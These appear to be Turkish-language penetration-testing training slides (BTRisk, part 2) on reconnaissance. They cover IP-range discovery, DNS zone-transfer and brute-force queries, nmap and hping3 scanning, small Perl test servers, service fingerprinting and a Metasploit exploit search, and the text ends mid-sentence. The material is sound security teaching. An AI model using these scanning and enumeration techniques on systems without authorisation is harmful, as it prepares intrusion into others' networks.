blog.btrisk.com @btrisk /btrisktv /btrisk
UYGULAMALI
SIZMA TESTİ
EĞİTİMİ-2

BTRİSK HAKKINDA
TANIŞMA
Pentest & BT Denetimi
ISO27001 Danışmanlık
Hizmetleri
BG Operasyon
Hizmetleri

BİLGİ
TOPLAMA

İÇERİK
• Hedef IP Aralığı Tespiti
• Canlı Sunucu Tespiti
• Port Tarama
• Servis ve İşletim Sistemi Tespiti
• Kullanıcı Tespiti

HEDEF IP ARALIĞI TESPİTİ
IP Aralıkları Tespit Yöntemleri
Eğer hedef kurumun IP adreslerini tespit etmek durumundaysak
izleyebileceğimiz yöntemler aşağıdaki gibidir (bu yöntemler
sırayla kullanılmak durumunda değildir, bir adımda elde edilen
bilgiler diğer bir adımda tekrar sorgulama yapmak için
kullanılabilir):
• 1.Adım: Internet adres otoritelerinin sorgulama imkanlarını
kullanmak
• 2.Adım: Hedef kuruma ait olabilecek sunucu alan adları ve IP
adreslerini çeşitli yöntemlerle tespit etmek ve (bu bilgileri
kullanarak) IP Whois sorgulamaları

HEDEF IP ARALIĞI TESPİTİ
Dünya İnternet Adres
Otoriteleri
IANA – Internet Assigned Numbers
Authority
AFRINIC (Afrika)
APNIC (Asya Pasifik)
ARIN (Kuzey Amerika)
LACNIC (Latin Amerika)
RIPE NCC (Avrupa, Orta Asya, Orta
Doğu)

HEDEF IP ARALIĞI TESPİTİ
Türkiye'nin dahil olduğu
coğrafyadan sorumlu
otorite
RIPE NCC

HEDEF IP ARALIĞI TESPİTİ
Internet üzerinde iletişim kurmak için ihtiyacınız olacak IP
adresini iki şekilde alabilirsiniz:
• Birinci yol olarak bir barındırma hizmeti firmasının veya
abonesi olduğunuz bir ISP (İnternet Servis Sağlayıcı - İSS)
firmasının size sabit olarak veya dinamik olarak atayacağı bir
IP adresini kullanmaktır. Dinamik olarak IP adresinin
atanmasından kasıt cihaz veya sunucunuzu her yeniden
başlatışınızda müsait olan bir IP adresinin size atanması, statik
olarak atanmasından kasıt ise cihaz veya sunucunuzu tekrar
başlatsanız da aynı IP adresini kullanmaya devam etmenizdir.
• İkinci yol ise sizin bölgesel internet adres otoritesinden kendi
adınıza ayırtmış olduğunuz IP adresleri veya IP adres
aralığından bir adresi sunucunuza atamanızdır.

HEDEF IP ARALIĞI TESPİTİ
TESPİTİ ZOR IP ADRES ARALIKLARI
Eğer kurum bir ISP kuruma ait bir IP aralığını kullanıyor, ancak
hali hazırda bu aralıkta bulunan sunuculardan herhangi bir HTTP
servisi vermiyor veya bu IP adresleri ile ilgili herhangi bir DNS
kaydı tanımlamamışsa bu aralığı bulmak pek mümkün değildir.
Çünkü IP aralığı tespit yöntemlerimiz kurumun adının internet
otoritelerinin veritabanlarında geçiyor olmasına (ki ISP IP
aralığının kullanılması durumunda bu mümkün olmayacaktır),
verdiği HTTP servisleri ve bu servisleri verdiği sunucuların alan
adları içinde kurum adının geçiyor olmasına, veya yapacağımız
forward, zone transfer ve bruteforce DNS sorgularında bu IP
adreslerinin görünmesi üzerine kuruludur. Bu açılardan hiçbir iz
bırakılmamışsa bizim bu IP aralığını tespit etmemiz zordur. (ör:
FKM sistemlerinin IP adresleri)

HEDEF IP ARALIĞI TESPİTİ
Internet Adres Otoritelerinin Sorgu İmkanlarını Kullanmak

HEDEF IP ARALIĞI TESPİTİ
Internet Adres Otoritelerinin Sorgu İmkanlarını Kullanmak

HEDEF IP ARALIĞI TESPİTİ
IP Whois Araçlarını Kullanmak
# dmitry 193.186.4
dmitry v.b. araçlarla internet
adres otoritelerinin sunduğu ip
whois servisleri belirli adresler
için sorgulanarak bu adreslerin
hangi aralıkta olduğu ve bu
aralıkların sahipliğine ilişkin
bilgi edinebiliriz

HEDEF IP ARALIĞI TESPİTİ
dmitry projesi
iwhois.h
dmitry projesi
iwhois.c
IP Whois Araçlarını Kullanmak

HEDEF IP ARALIĞI TESPİTİ
EGZERSİZ
• Kurumunuzun sahibi olduğu IP aralıklarını adres otoritelerinin
sağladığı imkanlardan faydalanarak tespit ediniz.
• Elde ettiğiniz yanıtlarda sosyal mühendislik saldırılarında
kullanılabilecek nitelikte bir bilgi var mı?

HEDEF IP ARALIĞI TESPİTİ
Açık Referanslardan Belirli Sunucu Tiplerinin Tespiti
Bing
domain:btrisk.com

HEDEF IP ARALIĞI TESPİTİ
Açık Referanslardan Belirli Sunucu Tiplerinin Tespiti
Google
site:btrisk.com -site:www.btrisk.com

HEDEF IP ARALIĞI TESPİTİ
Web Sunucularının Spider Edilmesi ve İlişkili Diğer Web Sunucularının Tespiti

HEDEF IP ARALIĞI TESPİTİ
Web Sunucularının Spider Edilmesi ve İlişkili Diğer Web Sunucularının Tespiti

HEDEF IP ARALIĞI TESPİTİ
Kali
# host -a btrisk.com
DNS Sorguları (Type ANY sorgusu)
Type ANY sorgularında
• Sorgulanan alan adının A
(Address) tipindeki kaydı
• MX (Mail eXchange)
sunucu kayıtları
• NS (Name Server) sunucu
kayıtları döner

HEDEF IP ARALIĞI TESPİTİ
Windows
(nslookup) > set type=all
DNS Sorguları (Type ANY sorgusu)

HEDEF IP ARALIĞI TESPİTİ
EGZERSİZ
• "host" komutu ile belli bir alan adı için yaptığınız bir DNS
sorgusunu Wireshark ile inceleyiniz. Sorgulanan kaydın tipi
nedir?
• "host" komutunun neticesinde sorgunun iletildiği sunucu IP
adresi nedir?
• DNS sorgunuzu 4.4.4.4 IP adresine iletecek komut değişikliğini
yapınız.

HEDEF IP ARALIĞI TESPİTİ
DNS Sorguları (Type AXFR sorgusu – Zone Transfer)
# dig axfr alanadi @dnssunucusu

HEDEF IP ARALIĞI TESPİTİ
DNS Sorguları (Type AXFR sorgusu – Zone Transfer)

HEDEF IP ARALIĞI TESPİTİ
DNS Bruteforce Sorguları

HEDEF IP ARALIĞI TESPİTİ
# dnsrecon -d google.com -D /usr/share/golismero/wordlist/dns/dnsrecon.txt -t brt
DNS Bruteforce Sorguları
dnsrecon aracının CNAME, A ve
AAAA (IPv6) tipinde sorgular
yaptığı görülüyor

HEDEF IP ARALIĞI TESPİTİ
DNS Reverse IP (PTR tipi) Sorguları
# dnsrecon -r 31.210.54.1-31.210.54.254

HEDEF IP ARALIĞI TESPİTİ
Çeşitli kaynaklardan hedef verisi toplayan araçlara örnek – the Harvester
# theharvester -d btrisk.com -b google -l 100 -h

HEDEF IP ARALIĞI TESPİTİ
Çeşitli kaynaklardan hedef verisi toplayan araçlara örnek – the Harvester
The Harvester aracının arama
motorlarından web sunucusu,
e-posta adresi sorguladığı,
Shodan veritabanından
sorgulama yaptığı görülüyor

CANLI SUNUCU TESPİTİ
• Halka açık kaynaklardan IP aralıkları, alan adları ve
DNS kayıtlarını elde ettikten veya sızma testi
muhatabı tarafından belirli bir IP aralığı verildikten
sonra sıra bu aralıkta aktif olabilecek sunucuların
tespitine gelir.
• Burada hedef aralığın genişliği ve kurumun güvenlik
ihtiyaçlarının düzeyi yapılacak taramaların
yoğunluğu ile ilgili bize yön gösterecektir.
• Bu noktadan sonra hedef ağ ile doğrudan etkileşim
artarak başlayacaktır. Bu nedenle stratejimiz en az
trafik doğuracak işlemlerden başlayarak ilerlemek
olacaktır.

CANLI SUNUCU TESPİTİ
TEMEL TCP / IP BİLGİSİ
TCP / IP paketine baktığımızda kabaca 5 katman vardır (OSI modeli ve
bunların TCP/IP ile ilişkilendirilmesine girmeyeceğiz):
• Fiziksel katman: Paketin tamamını ifade eder, incelememiz açısından bir
önemi bulunmamaktadır.
• Veri bağlantı katmanı (data link layer): Paketin yerel ağda iletimi için
önemli başlık alanıdır. MAC adreslerinin esas alındığı bir katmandır. Yerel
alan saldırıları açısından bilinmesi önemlidir, ancak bu noktada
derinlemesine değinmeyeceğiz.
• Ağ katmanı (network layer): İncelememiz açısından önemli olup IP
adreslerinin paket iletiminde önem kazandığı katmandır. Bu adresler
özellikle paketler yerel ağdan çıktığı durumlarda önemlidir, zira veri
bağlantı katmanı yerel ağdan çıkıldığında paketten sıyrılır ve sonraki LAN
veya WAN protokollerine uygun olarak farklı ceketlere sahip olarak
hedefine doğru yoluna devam eder.

CANLI SUNUCU TESPİTİ
TEMEL TCP / IP BİLGİSİ (devamı)
• Taşıma katmanı (transport layer): Bu katman kabaca iletilen paketlerin
üzerinde seyahat ettiği hattın ihtiyaçlarına bağlı olarak veya farklı
paketlerin farklı sıralarda hedefe ulaşabileceği gerçeği nedeniyle
paketlerin doğru sırada ve tam olarak karşı tarafa iletilmesinden sorumlu
ağ protokol katmanıdır. Ancak TCP ve UDP için anlamlı olan bu tanım ICMP
için pek bir anlam ifade etmeyecektir. Bu nedenle her ağ protokolünün
tüm bu katmanlara karşılık gelmesini beklememek gereklidir. Bu gerçek
OSI teorik modeli için daha da doğrudur, çünkü TCP/IP paketlerini 7
katmandan oluşan bu modelle eşleştirmek daha da zordur.
• Uygulama katmanı (application layer): Bu katman da daha çok TCP ve
UDP protokolleri ile daha iyi anlam bulan bir katmandır. İletilen paketin
içinde uygulama seviyesinde anlam kazanan verilerin bulunduğu
bölümdür. Taşıma ve Uygulama katmanlarına örnekleri bir HTTP paketi ve
bir DNS paketi içinde inceleyeceğiz.

CANLI SUNUCU TESPİTİ
Yerel ağ'da MAC adresi ile iletişim kurulur.
IP paketini gönderen istemci ya bu IP adresinin
sahibini sorgular ya da mevcutsa ARP cache'inde
bulunan MAC adresini kullanır.
Gönderilen paketin içinde hedef IP adresi vardır,
ancak Layer 2 cihazlar (switch'ler) MAC adresini
esas alarak yönlendirme yapar.
ARP Poisoning ile araya girme yöntemi bu tasarım
özelliğini kullanır.
HTTP Paket Örneği (Veri Bağlantı Katmanı)
IPv4

CANLI SUNUCU TESPİTİ
Güvenlik açısından önemli IP başlık
alanları:
• Kaynak ve hedef IP adresleri
• Time to live alanı
• Flags, Fragment Offset ve
Identification alanları
• Source Routing option alanları
HTTP Paket Örneği (Ağ Katmanı)

CANLI SUNUCU TESPİTİ
Güvenlik açısından önemli TCP
başlık alanları:
• Kaynak ve hedef port
numaraları:
• Flags alanı
• TCP Sequence ve
Acknowledgement sıra
numaraları
HTTP Paket Örneği (Taşıma Katmanı)

CANLI SUNUCU TESPİTİ
HTTP Paket Örneği (Uygulama Katmanı)
Wireshark bu paketin
uygulama katmanında HTTP
protokolünün taşındığını nasıl
anlamış olabilir?..

CANLI SUNUCU TESPİTİ
EGZERSİZ
• Kali üzerinde "python –m SimpleHTTPServer 500" komutu ile
TCP 500 portundan dinleyen basit bir HTTP sunucusunu
başlatınız
• Kali üzerinde "eth0" arayüzünü Wireshark ile dinlemeye
başlayınız
• Host bilgisayarınızdan browser ile Kali bilgisayarınızın TCP 500
portuna bağlanınız
(ör: http://192.168.163.128:500 şeklinde)
• Wireshark'ın TCP 500 portu ile yapılan iletişimi HTTP protokolü
olarak yorumlamasını sağlayınız
İPUCU: Wireshark'ın "Decode As" özelliğini kullanınız

CANLI SUNUCU TESPİTİ
DNS Paket Örneği (Taşıma Katmanı)

CANLI SUNUCU TESPİTİ
DNS Paket Örneği (Uygulama Katmanı)

CANLI SUNUCU TESPİTİ
ICMP Paket Örneği (Ağ Katmanı)
ICMP'nin IP
protokol
numarası "1"

CANLI SUNUCU TESPİTİ
ICMP Paket Örneği
ICMP için bir port kavramı
bulunmamaktadır
ICMP paketlerinin türünü Type
ve Code alanları belirler

CANLI SUNUCU TESPİTİ
EGZERSİZ
• Kali üzerinde "eth0" arayüzünü Wireshark ile dinlemeye
başlayınız
• Kali'den host (Windows) bilgisayarınıza doğru "ping" komutunu
çalıştırınız
• Host (Windows) bilgisayarınızdan Kali'ye doğru "ping" komutunu
çalıştırınız
• Her iki istek arasındaki farkları Wireshark'tan
inceleyiniz

CANLI SUNUCU TESPİTİ
"nmap" opsiyonlarının anlamları
-sn (port tarama yapma)
-PE (Echo Request)
-PP (Timestamp)
-PM (Address Mask Request)
ICMP Tarama
# nmap -sn -PE -PP -PM 192.168.165.0/24

CANLI SUNUCU TESPİTİ
Lokal Subnet'te Sunucu Tespiti
Nmap'in lokal ağda sunucu
tespitinde ilk olarak izlemeyi tercih
ettiği yol bizim tarama
opsiyonlarımızdan farklı.

CANLI SUNUCU TESPİTİ
Lokal Subnet'te Sunucu Tespiti
Nmap'in ürettiği paketleri incelediğimizde biz ICMP
tarama yapmak istemiş olsak da nmap'in lokal ağda
öncelikle ARP request paketlerini kullandığını
görüyoruz.
Bu yöntem hedef sunucular açısından daha az şüphe
çekici bir yöntem. Ama yerel ağı dinleyen bir IDS için
ICMP taraması kadar bariz bir tarama işlemi.

CANLI SUNUCU TESPİTİ
İnternet'te sık rastlayabileceğiniz portlar
• HTTP (TCP 80)
• HTTPS (TCP 443)
• DNS (UDP 53, TCP 53)
• IPSEC (UDP 500 - IKE protokülü)
• SMTP (TCP 25)
• SSH (TCP 22)
• SIP (TCP/UDP 5060, 5061)
• FTP (TCP 21)
• TELNET (TCP 23)
• CHECKPOINT (TCP 264 - Topoloji servisi)
Sık Rastlanan Servis Portlarının Taranması

CANLI SUNUCU TESPİTİ
İntranet'te sık rastlayabileceğiniz portlar:
• NETBIOS over TCP – NBT ( (UDP 137 - Name servisi)
• SMB (TCP 139 – Dosya ve yazıcı paylaşımı için kullanılır)
• CIFS (TCP 445 – SMB’nin yerini alan Windows dosya paylaşım protokolü)
• RDP (TCP 3389)
• HTTP (TCP 80)
• HTTPS (TCP 443)
• HTTP PROXY (TCP 8080, TCP 3128 - Squid proxy servisi)
• SNMP (UDP 161)
• LDAP (TCP 389)
• FTP (TCP 21)
• TELNET (TCP 23)
• RPC (UDP 111)
• NFS (TCP 2049)
• MSSQL (TCP 1433)
• MySQL (TCP 3306)
• ORACLE (TCP 1521)
Sık Rastlanan Servis Portlarının Taranması

CANLI SUNUCU TESPİTİ
# nmap -sS -
p21,22,23,25,53,80,139,264,389,443,445,1433,1521,2049,3128,3306,3389,
5060,8080 192.168.163.129
Sık Rastlanan Servis Portlarının Taranması (TCP Tarama)

CANLI SUNUCU TESPİTİ
Sık Rastlanan Servis Portlarının Taranması (UDP Tarama)
# nmap -sU -p53,111,121,137,161,500,5060 192.168.163.129

CANLI SUNUCU TESPİTİ
Unique isimlerinden
<00> – Workstation adı,
Group isimlerinden
<00> – Workgroup, domain adı anlamına
gelir.
Ayrıca bazı Netbios suffix’leri sunucu üzerinde
çalışan servisler ve diğer bilgileri ifade eder
(örneğin Unique isimlerinden 20 - dosya
sunucusu olduğunu, Group isimlerinden 1C
domain controller olduğunu belirtir).
NetBIOS İsim Servisinin Taranması

CANLI SUNUCU TESPİTİ
NetBIOS İsim Servisinin Taranması
NetBIOS taraması her zaman Windows
sunuculara ilişkin veri döndürmez.
Seyrek olsa da üzerinde Samba yüklü
olan Unix / Linux sunucular da bu
taramalarda görünür.
Kali üzerinde SMB erişimi
için gerekli Samba
paketleri zaten yüklü

CANLI SUNUCU TESPİTİ
NetBIOS İsim Servisinin Taranması
NetBIOS name server'ın
başlatılması

CANLI SUNUCU TESPİTİ
NetBIOS İsim Servisinin Taranması

CANLI SUNUCU TESPİTİ
NetBIOS İsim Servisinin Taranması
Kali sunucusunun NetBIOS
taramasında görünmesi

CANLI SUNUCU TESPİTİ
EGZERSİZ
• Öğrendiğiniz canlı sunucu tespit etme yöntemlerini uygulayarak
LAB ortamındaki bilgisayarları tespit ediniz.
• Canlı sunucu tespiti sırasında edindiğiniz sunucu adı ve çok
kullanılan portlardan tespit ettiklerinizi not ediniz.
ÖNEMLİ: Bu aşamada vakit kaybı yaşamamak için Full (yani 1-
65535 arasındaki tüm portlar için) Port
Taraması yapmayınız.

PORT TARAMA
#!/usr/bin/perl
use IO::Socket::INET;
# flush
$| = 1;
my ($socket,$client_socket);
my ($peeraddress,$peerport);
$socket = new IO::Socket::INET (
LocalHost=> '0.0.0.0',
LocalPort=> '5000',
Proto => 'tcp',
Listen => 5,
Reuse => 1
) or die "Soket olusturulamadi : $!n";
print "TCP sunucu dinliyor ...n";
while(1) {
$client_socket = $socket->accept();
$peer_address = $client_socket->peerhost();
$peer_port = $client_socket->peerport();
print "Yeni baglanti : $peeraddress, $peerportn ";
while(1) {
$client_socket->recv($data,1024);
print "Istemciden alinan veri : $datan";
if ($data eq "selamn") {
$data = "Sana da selam...n";
$client_socket->send($data);
}
}
}
$socket->close();
TCP Servis Örneği

PORT TARAMA
TCP Servis Örneği
TCP servisimizi
başlatıyoruz

PORT TARAMA
TCP Servis Örneği
Kali'den TCP 5000
portundan dinleyen
servise bağlanıyoruz

PORT TARAMA
TCP Servis Örneği
Netcat ile TCP sunucusuna bağlandığımız anda
herhangi bir veri iletilmemiş olmasına rağmen
bir iletişim gerçekleşmiş.
Bu iletişim TCP protokolünün gereği olan TCP el
sıkışma (handshake) paketlerinden oluşuyor.

PORT TARAMA
TCP Servis Örneği
Paketler Fonksiyon StatüStatü Fonksiyon
SUNUCUİSTEMCİ

PORT TARAMA
TCP Servis Örneği
SYN paketi
İstemci sıra numarasını
üretiyor

PORT TARAMA
TCP Servis Örneği
Sadece SYN bayrağı işaretli

PORT TARAMA
TCP Servis Örneği
SYN, ACK paketi
Sunucu istemci'nin sıra
numarasını acknowledge
ediyor.
Yani istemcinin sıra
numarasına "1" ekleyerek
geri gönderiyor.

PORT TARAMA
TCP Servis Örneği
SYN, ACK paketi
Sunucu kendi sıra
numarasını üretiyor

PORT TARAMA
TCP Servis Örneği
SYN ve ACK bayrakları
işaretli

PORT TARAMA
TCP Servis Örneği
ACK paketi
İstemci sunucu'nun sıra
numarasını acknowledge
ediyor.
Yani sunucunun sıra
numarasına "1" ekleyerek
geri gönderiyor.
3. paketin iletimiyle birlikte
bağlantı kurulmuş oluyor

PORT TARAMA
TCP Servis Örneği
İstemci'den "hello" kelimesini sunucuya gönderiyoruz.
Ancak herhangi bir veri alamıyoruz. Bunun sebebi
sunucunun sadece "selam" kelimesine yanıt veriyor
olması.
Veri dönmese de TCP protokolünün gereği olarak
sunucudan bir ACK paketinin dönmüş olması lazım.

PORT TARAMA
TCP Servis Örneği
İstemciden giden paketteki
veri bölümü

PORT TARAMA
TCP Servis Örneği
Sunucu herhangi bir veri
döndürmemesine rağmen
istemciden aldığı 6 byte'lık
veriyi acknowledge ediyor
ve ACK sıra numarasını 6
artırıyor.

PORT TARAMA
TCP Servis Örneği
Bu defa istemci'den "selam" verisini gönderiyoruz.
Bir önceki istekten farklı olarak bu defa veri içeren bir
yanıt alıyoruz.

PORT TARAMA
TCP Servis Örneği
İstemciden giden paketteki
veri bölümü

PORT TARAMA
TCP Servis Örneği
Sunucudan dönen pakette
bulunan veri bölümü.
Bu paketle sunucu aynı
zamanda istemciden bir
önceki pakette gelen veri
miktarında ACK
numarasını da artırıyor.

PORT TARAMA
TCP Servis Örneği
İstemci sunucudan dönen
yanıtı aldığını teyit etmek
için ACK numarasını
sunucunun ilettiği veri
miktarı kadar artırarak
ACK paketini iletiyor.

PORT TARAMA
#!/usr/bin/perl
use IO::Socket::INET;
# flush
$| = 1;
my ($socket,$received_data);
$socket = new IO::Socket::INET (
LocalPort => '5000',
Proto => 'udp',
) or die "Soket olusturulamadi : $!n";
print "UDP sunucu dinliyor...n";
while(1) {
$socket->recv($received_data,1024);
print "Istemcidenalinan veri : $received_datan";
if ($received_data eq "selamn") {
$socket->send("Sana da selam...n");
}
}
$socket->close();
UDP Servis Örneği
Şimdi UDP iletişimini
analiz etmek üzere aynı
fonksiyonaliteyi bir UDP
servisi üzerinden
sağlayalım.

PORT TARAMA
UDP Servis Örneği
UDP servisimizi
başlatıyoruz

PORT TARAMA
UDP Servis Örneği
Yine Netcat ile karşıdaki
servise bağlantı kuruyoruz
Ancak bu defa karşıdaki
servis bir UDP servisi
# nc –u 192.168.1.149 5000

PORT TARAMA
UDP Servis Örneği
TCP bağlantısında bu
aşamada el sıkışma
paketleri iletilmişti.
UDP için böyle bir durum
söz konusu değil, yani
aslında sunucu henüz
istemcinin varlığının
farkında bile değil.

PORT TARAMA
UDP Servis Örneği
UDP servisine anlamadığı
bir istek gönderiyoruz.
Servisimiz sadece "selam"
isteğine yanıt veriyor.
Dolayısıyla herhangi bir
yanıt alamıyoruz.

PORT TARAMA
UDP Servis Örneği
Sunucunun isteği aldığını
görebiliyoruz

PORT TARAMA
UDP Servis Örneği
Bu iletişimde sadece bir
paket yer almış
Sunucu tamamen sessiz
kalmayı tercih etmiş

PORT TARAMA
UDP Servis Örneği
Bu defa sunucunun
anladığı dilden bir istek
gönderiyoruz.
Sunucu da bize bir yanıt
veriyor.

PORT TARAMA
UDP Servis Örneği
Sunucu sadece beklediği
bir istek geldiğinde yanıt
üretti.

TCP ve UDP SERVİSLERİ İNCELEMESİNİN SONUCU
• TCP ve UDP servislerinin davranışları içerik itibarıyla aynı
olmasına rağmen TCP servisi protokolün çalışma yöntemi
nedeniyle servisin doğru istek gönderilmese bile ifşa olmasına
neden olmaktadır.
• UDP servisi beklediği veri (payload) iletilmezse sessizliğini
korumaktadır. Bu davranış eğer firewall yok ise UDP portunun
açık olduğu anlamına gelmektedir. Ancak firewall var ise istek
paketinin DROP edildiği veya sunucudan dönecek olan ICMP
Port Unreachable paketinin filtrelendiği anlamına da gelir.
• Bu sebepten dolayı UDP taramalarındaki hız ve kesinlik
düşmektedir.
PORT TARAMA

PORT TARAMA
Kapalı TCP Portu Davranışı
# hping3 192.168.1.149 -V -c 1 -S -p 5001
"hping" ile kapalı olduğunu bildiğimiz bir TCP
portuna 1 adet SYN paketi gönderiyoruz

PORT TARAMA
Kapalı TCP Portu Davranışı
Sunucu kapalı bir TCP
portuna istek yapıldığında
RST, ACK yanıtı dönüyor

PORT TARAMA
Kapalı UDP Portu Davranışı
"hping" ile kapalı olduğunu bildiğimiz bir UDP
portuna 1 adet UDP paketi gönderiyoruz
UDP paketinin veri bölümü bulunmuyor

PORT TARAMA
Kapalı UDP Portu Davranışı
Kapalı bir UDP portuna
paket gönderildiğinde
sunucu ICMP Port
Unreachable paketi ile
istemciyi bilgilendiriyoruz

PORT TARAMA
Full TCP Port Tarama
Full tarama yapacağımız
sunucumuzun açık olan
servisleri yukarıdaki gibidir

PORT TARAMA
Full TCP Port Tarama
Tarama yapılacak olan sunucu üzerindeki
firewall kurallarını Flush ediyoruz ve
herhangi bir kural tanımlı olmadığından
emin olmak için kuralları listeliyoruz

PORT TARAMA
Tüm TCP portları için SYN taraması yapıyoruz.
SYN taraması istemci tarafından TCP handshake
tamamlanmadan son adımda iletişimin RST
paketi ile kesilmesi yöntemi ile yapılır.
El sıkışma işleminin tamamlandığı yönteme
Connect scan (-sT opsiyonuyla yapılır) adı
verilir.
Full TCP Port Tarama
Firewall aktifken tarama süresi
11,88 sn.
Her 2 TCP portumuzu da tespit
edebildik.

PORT TARAMA
Full TCP Port Tarama
Bu defa TCP port taramasından önce TCP
80 ve TCP 5000 portları dışındaki tüm
portlara yapılan istekleri DROP edecek
biçimde firewall kurallarını tanımlıyoruz.

PORT TARAMA
Firewall aktifken tarama süresi
115,68 sn.
Tarama sonuçları aynı olmasına rağmen
nmap'in işi 10 kata yakın süre daha fazla
sürdü. Bu fark nmap'in yanıt alamadığı
istekler için belli bir süre beklemesinden
kaynaklanıyor.
Full TCP Port Tarama

PORT TARAMA
Full port tarama yapmadığımız için
UDP 34841 portu tespit
edilememiş.
UDP 161 dışındaki portların da açık
olduğundan kesin olarak emin
olamamış.
UDP Port Tarama
Full UDP port tarama yapmadan önce
yine tüm firewall kurallarını kaldırdık.
UDP port taramada TCP taramadan
farklı olarak tüm portları taramadık.
Nmap öntanımlı olarak Top 1000 portu
tarıyor.
Sadece 1000 port taranmış olmasına
rağmen UDP taramasının süresi TCP
taramalarına göre çok daha uzun
sürdü.

PORT TARAMA
UDP Port Tarama
Bu defa UDP port taramasından önce aktif
olan UDP portları dışındaki tüm portlara
yapılan istekleri DROP edecek biçimde
firewall kurallarını tanımlıyoruz.

PORT TARAMA
Firewall aktifken kapalı UDP portları ile açık ancak beklediği girdiyi almadığında
yanıt üretmeyen UDP portları aynı biçimde davrandığından tüm bu portların
kapalı olduğuna kanaat getirdi.
Nmap'in SNMP protokolü (UDP 161) için hazır probe payload’u bulunduğundan
nmap bu portu net olarak açık şeklinde belirledi. Ancak diğerlerini gözden
kaçırdı.
UDP Port Tarama
Bu defa tarama süresi çok düştü.
Muhtemelen nmap yanıt vermeyen
portlar için bekleme süresini azalttı.

PORT TARAMA
Full UDP Port Tarama
Full UDP port tarama işlemi
firewall'suz top 1000 port tarama ile
yaklaşık aynı süre sürdü. Ancak SNMP
dışındaki tüm servisler gözden
kaçırıldı.

PORT TARAMA
EGZERSİZ
• Full TCP ve UDP taramalarından neden 1-65535 arasındaki
portlar taranmaktadır, üst limit neden 65535'dir?
• Canlı olduğunu tespit ettiğiniz "1" LAB sunucusu için full TCP ve
UDP taramalarını gerçekleştirin.

SERVİS VE İŞLETİM SİSTEMİ TESPİTİ
#!/usr/bin/perl
use IO::Socket::INET;
# flush
$| = 1;
my ($socket,$client_socket);
my ($peeraddress,$peerport);
$socket = new IO::Socket::INET (
LocalHost => '0.0.0.0',
LocalPort => '5000',
Proto => 'tcp',
Listen => 5,
Reuse => 1
) or die "Soket olusturulamadi : $!n";
print "TCP sunucu dinliyor ...n";
while(1) {
$client_socket = $socket->accept();
my $data = "220 BTRisk FTP Sunucusuna Hoşgeldinizrn220 ProFTPD 1.3.5 Server (ProFTPD)";
$client_socket->send($data);
}
$socket->close();
Servis ve Versiyon Tespiti

SERVİS VE İŞLETİM SİSTEMİ TESPİTİ
Servis ve Versiyon Tespiti
Netcat ile servisimize TCP bağlantısı kurar
kurmaz bir banner ile karşılaşıyoruz

SERVİS VE İŞLETİM SİSTEMİ TESPİTİ
Servis ve Versiyon Tespiti
Nmap TCP 5000 portundaki
servisimizin ProFTPD 1.3.5
olduğu sonucuna vardı
# nmap -Pn -sV -version-all -p1-65535 192.168.163.129

SERVİS VE İŞLETİM SİSTEMİ TESPİTİ
“-Pn”: Nmap normalde bir sunucuya yönelik port taraması yapmadan önce bir ping
paketi, buna yanıt alamazsa TCP 80 ve 443 portlarına birer paket gönderir. Böylece
sunucunun ayakta olup olmadığını anlamaya çalışır, eğer herhangi bir yanıt alamaz ise de
taramayı gerçekleştirmez. “-Pn” opsiyonu özellikle firewall arkasında bulunan ve mevcut
olduğunu düşündüğümüz veya çok kritik olabilecek sunucular için mutlaka kullanılması
gereken bir opsiyon, aksi takdirde port taramamız gerçekleşmeyecektir.
“-sV”: Bu opsiyon nmap’e sadece port tarama yapmamasını, aynı zamanda tespit ettiği
servislerin ne olduğuna yönelik inceleme de yapması gerektiğini belirtir. Bu seçenek
neticesinde nmap tespit edilen servislere UDP taramasında uyguladığı stratejiye benzer
şekilde bazı payload’lar gönderir. Bu payload’lar servisin tam olarak ne olduğunu anlama
konusunda bizi çok daha iyi aydınlatır.
“--version-all”: nmap’in normalde kendine göre uyguladığı bir optimizasyon var, buna
göre belirli payload’ları belirli portlara yönelik olarak gönderiyor. Bu opsiyonla nmap’e
tespit ettiğin portlar için elindeki tüm payload’ları kullan emrini veriyoruz. Elbette bu
yöntem çok daha fazla paket üretilmesine neden olacak, özellikle servis sayısı arttığında
bu durum katlanacak.
“-p1-65535”: Bu opsiyon bildiğiniz gibi full port taraması için kullandığımız opsiyon.
Servis ve Versiyon Tespiti

SERVİS VE İŞLETİM SİSTEMİ TESPİTİ
Servis ve Versiyon Tespiti
msf > search type:exploit name:ProFTP
Eğer tespitimiz doğru olsaydı
bir sonraki adım servisle ilgili
açıklıkları aramak olacaktı

SERVİS VE İŞLETİM SİSTEMİ TESPİTİ
Servis ve Versiyon Tespiti

SERVİS VE İŞLETİM SİSTEMİ TESPİTİ
Servis ve Versiyon Tespiti
Nmap'in servis tespiti için kullandığı
probe yöntem ve payload'ları
/usr/share/nmap/nmap-service-
probes dosyasında yer almaktadır
Bu probe yönteminde servise
herhangi bir payload
gönderilmemekte ve 6 saniye
beklenmektedir
TCP 9100-9107 arası portlar
yazıcılar tarafından
kullanıldığından nmap tarafından
kapsam dışında bırakılmıştır

SERVİS VE İŞLETİM SİSTEMİ TESPİTİ
Buradaki regular expression’ı okursak:
• İlk satır satır başında 220 ile başlamak kaydı ile herhangi bir metin
• İkinci satır başında da yine “220 ProFTPD “ ile başlayan, devamında herhangi
bir word karakteri (yani küçük harf, büyük harf, rakam ve alt çizgi) veya alt çizgi
veya tire karakterlerinden en az bir adetten oluşan bir kelime, devamında da “
Server (ProFTPD)” ifadesini arıyor.
• İkinci satırda parantez işaretleri arasında bulunan kısım ise nmap tarafından
servisin versiyonu raporlanırken kullanılıyor ($1 bu eşleşmenin yerine geçiyor).
Servis ve Versiyon Tespiti

SERVİS VE İŞLETİM SİSTEMİ TESPİTİ
Servis ve Versiyon Tespiti
Service probes dosyasında yaklaşık
10.000 satır var

SERVİS VE İŞLETİM SİSTEMİ TESPİTİ
Null probe dışında bir örnek vermek gerekirse HTTP servislerini tespit etmeye
yönelik bir probe örneği olarak bu örnek verilebilir, bir GET isteğinden sonra iki
enter’ı ifade eden bir probe sonrasında aşağıda gelen match ifadeleri bekleniyor.
Ancak port numaraları sınırlanmış. Bizim nmap taramamızda kullandığımız "--
version-all" opsiyonu bu sınırlandırmayı iptal ediyor.
Servis ve Versiyon Tespiti

SERVİS VE İŞLETİM SİSTEMİ TESPİTİ
İşletim sistemi tahmininin gerekçeleri:
• Hedef sunucunun açıklık barındırıp barındırmadığının tahmini (örneğin rwho
servisi Solaris 7-9 arasında exploit edilebilirken Solaris 10’da bu açıklık
giderilmiştir).
• Exploit kodlarının çalışabilmesi için düzenlenmesi (açıklık barındıran bir
servis tespit etseniz bile exploit kodunuzun içindeki adreslerin hedef işletim
